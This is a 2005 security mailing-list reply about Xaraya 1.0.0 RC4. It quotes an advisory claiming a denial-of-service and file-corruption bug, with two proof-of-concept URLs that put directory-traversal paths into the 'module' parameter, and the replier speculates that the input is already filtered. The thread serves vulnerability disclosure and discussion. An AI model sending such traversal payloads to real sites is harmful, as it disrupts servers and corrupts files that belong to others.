On 29 Nov 2005 retrogod@xxxxxxxxxxxxx wrote:

> Xaraya <= 1.0.0 RC4 D.O.S / file corruption
>
> software:
> site: http://www.xaraya.com
> description: "Xaraya 1.0 Core is an Open Source web application framework
> written in PHP"
>
> i) you can create an empty dir, in some cases this leads to D.O.S. condition, poc:
>
> http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php
> http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess

Being that Xaraya is a fork from PostNuke, which is a fork of PHP Nuke, the input would already have been checked for directory traversal among other things.

--
Paul Laudanski, Microsoft MVP Windows-Security
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com